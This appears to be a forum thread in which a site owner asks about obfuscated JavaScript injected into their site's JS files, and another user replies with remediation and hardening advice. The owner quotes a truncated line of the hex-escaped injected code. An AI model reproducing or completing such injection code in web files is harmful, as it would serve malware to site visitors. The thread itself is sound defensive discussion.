Does anyone know about this malware georgewkohn or bentley.poststreetdental

Server Config
1

Hi guys my website just been hacked google showing the red (Warning: Something’s Not Right Here!
www.xxxxxxxx.com contains malware. Your computer might catch a virus if you visit this site.)

stating the site has trying to access these two sites
http://xxxxxxx.com/direct.php?page=15f48be84d67654d
http://xxxxxxx.com/direct.php?page=15f48be84d67654d

Now found alot of my js files to have this code at the bottom when i remove it minimise the amount of error on chrome console inspector element, does anyone know if someone actually opened logged in to my FTP accessed the js files and paste those code into it. or if it is some sort of a program that does wrote that.

var _0x965b=["\\x3C\\x64\\x69\\x76\\x20\\x6E\\x61\\x6D\\x65\\x3D\\x22 ..... \\x65"];document[_0x965b[1]](_0x965b[0]);

At momment i am trying going to every single file and delete that line of code, but I am not sure if it might be something else or if somone has a way of accessing my FTP i’ve changed the password.

Any sugestion?

Do I just delete the code on JS files? or should I look for something else on the server?

2

macaela,

You have been hacked!

  1. Tighten your security (FTP passwords, cPanel passwords, and carefully check any/all uploaded files!

  2. Check ALL files for this type of nefarious code and eliminate these lines (the entire javascript). Better yet, simply delete all your files and upload from your master copy.

  3. Have your host run maldet scans until it reports NO problems on successive scans.

My host recommends this series of “precautionary steps” (after recovering from a hack attack):

  • Always use alphanumerical passwords and change the passwords frequently including cpanel password.
  • Keep scripts up to date- You should always keep your scripts updated to the latest stable version. Many new script releases contain security patches so it is very important to always upgrade.
  • Use trusted scripts- Use scripts from trusted developers that have a good track record of maintaining and updating their scripts.
  • Use secure permissions- Never use permissions 777 on folders or 666 on files.
  • Remove stuff you are not using- A very common source for account exploits is abandoned scripts which are not updated. Clients often install scripts for testing and forget about them, which are subsequently exploited and used to hijack the entire hosting account.
  • Disable Anonymous FTP accounts

Regards,

DK